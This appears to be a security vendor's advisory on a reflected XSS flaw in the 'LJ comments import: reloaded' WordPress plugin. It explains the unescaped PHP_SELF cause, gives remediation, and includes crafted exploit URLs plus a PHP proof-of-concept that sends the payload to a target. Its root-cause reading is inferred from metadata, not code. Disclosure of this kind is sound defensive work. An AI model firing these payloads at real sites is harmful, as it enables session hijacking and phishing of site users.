Atomic Edge analysis of CVE-2026-8624 (metadata-based):
The LJ comments import: reloaded plugin for WordPress, versions 0.97.1 and below, contains a reflected cross-site scripting vulnerability. This flaw stems from the use of PHP_SELF in generating output without proper sanitization. An unauthenticated attacker can inject arbitrary JavaScript into page output that executes when a victim clicks a crafted link. The CVSS score is 6.1 (medium), with a network attack vector, low complexity, no privileges required, but user interaction is necessary.
Root Cause: The vulnerability exists because the plugin echoes the PHP_SELF server variable without escaping. PHP_SELF includes the PATH_INFO component, which an attacker can control by appending extra path segments to the URL. The CVE description specifies two distinct unsanitized echo points for this value within the same function. This is a classic CWE-79 improper neutralization pattern. Atomic Edge analysis infers this from the description and CWE classification since no source code diff is available. The plugin likely uses echo $_SERVER[‘PHP_SELF’] or print $_SERVER[‘PHP_SELF’] directly in a template or function that processes the import interface.
Exploitation: An attacker crafts a URL such as https://target.com/wp-admin/admin.php?page=lj-comments-import-reloaded/” onmouseover=”alert(1)” or appends the payload as a PATH_INFO segment: https://target.com/wp-admin/admin.php/lj-comments-import-reloaded%22%3E%3Cscript%3Ealert(1)%3C/script%3E. When the page loads, the injected script or event handler executes in the victim’s browser context. No authentication is required, and the attack works via simple link tricking (e.g., email or social engineering).
Remediation: The fix requires replacing every echo of $_SERVER[‘PHP_SELF’] with esc_html($_SERVER[‘PHP_SELF’]) or similar output-escaping function. WordPress provides esc_html() and esc_attr() for safe context-specific encoding. The plugin should also consider using admin_url() or self_admin_url() with proper arguments instead of relying on PHP_SELF. Since no patched version exists, sites must either uninstall the plugin or manually apply the escaping patch in the plugin source files.
Impact: Successful exploitation results in reflected cross-site scripting. An attacker can inject arbitrary HTML and JavaScript into the WordPress admin or front-end pages generated by this plugin. This enables session hijacking, phishing, defacement, or redirection to malicious sites. The CVSS Confidentiality and Integrity impact are both low, but the lack of privileges needed makes this a practical vector for drive-by attacks against administrators or users who visit the affected page.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8624 - LJ comments import: reloaded <= 0.97.1 - Reflected Cross-Site Scripting via PHP_SELF Parameter
// This proof of concept demonstrates reflected XSS by injecting a payload into the PHP_SELF path
// The vulnerable plugin echoes $_SERVER['PHP_SELF'] without escaping, allowing attacker-controlled
// PATH_INFO to render JavaScript.
// Configuration
$target_url = 'http://wordpress.local'; // CHANGE THIS to the WordPress target URL
// The payload is appended as PATH_INFO after the admin page
// The plugin slug for the admin page is 'lj-comments-import-reloaded'
// Common WordPress admin page slug for this plugin: 'lj-comments-import-reloaded'
// We inject a script tag via URL path (PATH_INFO gets appended to PHP_SELF)
$payload = '/lj-comments-import-reloaded/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E';
// Build the full URL with path traversal
// The /wp-admin/admin.php part remains intact; the plugin page slug plus payload becomes PATH_INFO
$exploit_url = rtrim($target_url, '/') . '/wp-admin/admin.php' . $payload;
// Display the crafted URL for manual testing
echo "[+] CVE-2026-8624 Exploit URL (click to trigger XSS):n";
echo $exploit_url . "nn";
// Optionally send the request to confirm the server echoes PHP_SELF unsanitized
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200) {
// Check if the payload appears in the response
if (strpos($response, 'alert("XSS")') !== false) {
echo "[+] The plugin echoes PHP_SELF unsanitized. XSS confirmed in response.n";
} else {
echo "[*] Request succeeded (HTTP 200), but payload not directly echoed. Ensure the admin page loads and check browser.n";
}
} else {
echo "[*] HTTP status: $http_code. The page may require authentication or different path.n";
}
?>
